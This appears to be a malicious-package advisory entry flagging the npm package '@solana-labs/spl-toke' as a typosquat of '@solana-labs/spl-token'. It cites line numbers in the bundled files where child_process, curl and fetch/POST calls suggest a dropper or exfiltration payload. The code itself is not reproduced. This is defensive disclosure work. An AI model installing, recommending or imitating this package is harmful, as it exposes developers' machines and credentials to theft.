MAL-2026-5787

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (490ce5d7e43d8a79aa85bbd24e7140ed074eee472f375092ab9b4cd650ce41f8) Package name `@solana-labs/spl-toke` is a one-character omission of the legitimate `@solana-labs/spl-token` package, abusing the official Solana Labs scope-and-name shape to confuse installers. The bundled outputs at lib/index.cjs.js and lib/index.esm.js contain repeated co-occurrences of `require('child_process')`, `curl` invocations, `fetch(` calls, and `POST` request shapes spread across many lines (e.g. cjs lines 11441, 11466, 11479, 11495, 11535 for child_process; lines 11441, 11495, 11535, 11589, 11629 for curl; lines 5041/5046, 11464, 11558, 11652 for fetch+POST). The combination of (a) a clear typosquat against a top-tier blockchain SDK namespace and (b) bundled subprocess + outbound HTTP primitives in a package that purports to be a thin SPL-token client matches the supply-chain dropper/exfil shape and should not be allowed to install on developer or build machines.